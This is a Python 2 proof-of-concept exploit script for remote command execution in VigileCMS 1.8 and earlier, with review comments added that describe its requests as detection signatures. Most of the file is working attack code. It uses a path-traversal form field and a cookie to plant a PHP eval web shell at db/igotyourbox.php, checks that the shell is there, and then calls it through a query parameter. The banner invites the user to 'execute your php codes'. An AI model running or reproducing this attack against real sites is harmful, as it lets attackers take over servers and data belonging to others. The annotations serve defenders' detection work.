"""VigileCMS <= 1.8 remote command execution proof-of-concept (Python 2).

Review notes, written from a defender's reading of what this script does as
written (nothing below is verified against the application itself):

* Python 2 only: ``print`` statements and the ``httplib``/``urllib`` modules.
  It will not run unmodified under Python 3.
* Transport is plain HTTP on a hard-coded ``port`` (80); there is no TLS and
  no command-line option for the port.
* Every request it sends is a usable detection signature for this activity:
  two GETs for ``db/index.php`` and ``db/pm/index.php``; two POSTs to
  ``index.php?pag=vedipm&inviapm=true`` whose form field ``to`` starts with
  ``../`` and whose ``rem_user`` cookie URL-decodes to ``/../`` (the second
  one carries a ``<?php eval(stripslashes($_GET[dox])); ?>`` tag inside the
  cookie); then GETs for ``db/igotyourbox.php``, the last with a ``dox=``
  query parameter.
* Error handling is minimal: only ``httplib.ResponseNotReady`` is caught;
  ``socket.error`` and any other failure surface as a traceback.
"""
import sys, httplib, urllib

print ""
# No target on the command line: print the usage banner and stop.
# The ``else`` branch prints the identical banner and then continues, so the
# text is duplicated verbatim (left as-is here).
if len(sys.argv)<=1:
    print "################################################"
    print " VigileCMS <= 1.8 Stealth "
    print " Remote Command Execution "
    print " "
    print " Discovered By The:Paradox "
    print " "
    print " Usage: "
    print " %s [Target] [Path] " % (sys.argv[0])
    print " "
    print " Example: "
    print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
    print " "
    print " You may have to set other options in the "
    print " code, like port if it isn't 80 "
    print " or options for old viglecms' versions. "
    print " "
    print "################################################\n"
    sys.exit()
else:
    print "################################################"
    print " VigileCMS <= 1.8 Stealth "
    print " Remote Command Execution "
    print " "
    print " Discovered By The:Paradox "
    print " "
    print " Usage: "
    print " %s [Target] [Path] " % (sys.argv[0])
    print " "
    print " Example: "
    print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
    print " "
    print " You may have to set other options in the "
    print " code, like port if it isn't 80 "
    print " or options for old viglecms' versions. "
    print " "
    print "################################################\n"
print "[.]Exploit Starting. "
#Some Vars
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
# NOTE(review): ``old`` only changes how the query string is joined (see
# ``pt``/``pt2`` below); nothing else in the script is version-specific.
port = 80 # hard-coded; there is no CLI option for it (see usage banner)
db = "db" #Directory of database
target = sys.argv[1]
# Optional path prefix for the install; defaults to "/" when not supplied.
# Note that the pre-flight GETs append "db/..." directly to it while the
# POSTs insert an extra "/" before index.php.
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
# Pre-flight: two GETs that only test for a 404. Any other status
# (403, 500, ...) is treated as "present" and the script carries on.
try:
    #Verifing /db/index.php
    conn = httplib.HTTPConnection(target,port)
    conn.request("GET", "%sdb/index.php" % (directory))
    r1 = conn.getresponse()
    print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
    if r1.status == 404: sys.exit("[-]/db/index.php not found (404). Aborted.")
    conn.close()
    #Verifing /pm/index.php
    conn = httplib.HTTPConnection(target,port)
    conn.request("GET", "%sdb/pm/index.php" % (directory))
    r1 = conn.getresponse()
    print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
    # This connection is never closed on the success path.
    if r1.status == 404: sys.exit("[-]/db/pm/index.php not found (404). Aborted.")
except httplib.ResponseNotReady: sys.exit("[-]ResponseNotReady. Aborted.")
# Query-string separators: ``old == 1`` builds "index.php/pag=...?inviapm=...",
# otherwise the usual "index.php?pag=...&inviapm=...".
if old == 1:
    pt = "/"
    pt2 = "?"
else:
    pt = "?"
    pt2 = "&"
# POST #1: form field ``to`` is a traversal-style filename
# ("../.paradox-got-this-one.php"); cookie ``rem_user`` URL-decodes to "/../"
# and ``rem_pass`` to "/index". Only the HTTP status is inspected, so the
# server-side effect is not observable from this script.
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '../.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 -->",response.status, response.reason
conn.close()
# POST #2: same endpoint; ``to`` is "../igotyourbox.php" and ``rem_user``
# URL-decodes to "/../<?php eval(stripslashes($_GET[dox])); ?>" -- a PHP tag
# carried in a cookie. The success check below presumes the application
# writes that cookie value into the file named by ``to`` (inferred from the
# script's own messages; not verifiable here).
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '../igotyourbox.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 -->",response.status, response.reason
conn.close()
# Success check: a GET for db/igotyourbox.php; "success" is simply "not 404".
try:
    conn = httplib.HTTPConnection(target,port)
    path = "%s%s/igotyourbox.php" % (directory,db)
    conn.request("GET", path)
    r1 = conn.getresponse()
    conn.close()
except httplib.ResponseNotReady: sys.exit("[-]ResponseNotReady. Aborted.")
print "[.]Verifing Exploit Success..."
if r1.status == 404: sys.exit("[-]Exploit Failed.")
else:
    print "[+]Done.\n[+]Removing the page..."
    # Cleanup GET: a PHP ``unlink(...)`` call is passed via the ``dox`` query
    # parameter. The response is never read and the connection is never
    # closed. Only the dot-prefixed ".paradox-got-this-one.php" name is passed
    # to unlink; db/igotyourbox.php itself is not removed by this script, so
    # it stays on disk as a durable artifact for incident response to look
    # for. How the unlink filename relates to the earlier POST parameters is
    # not evident from the script.
    conn = httplib.HTTPConnection(target,port)
    path = directory + "db/igotyourbox.php?dox=unlink('%3C?php%20eval(stripslashes($_GET[dox]));%20?%3E.paradox-got-this-one.php');"
    conn.request("GET", path)
    # The "With Content:" line of this message is empty in this copy of the
    # script; the intended text is not recoverable here.
    print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s%s/igotyourbox.php \n With Content:\n \n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,directory,db)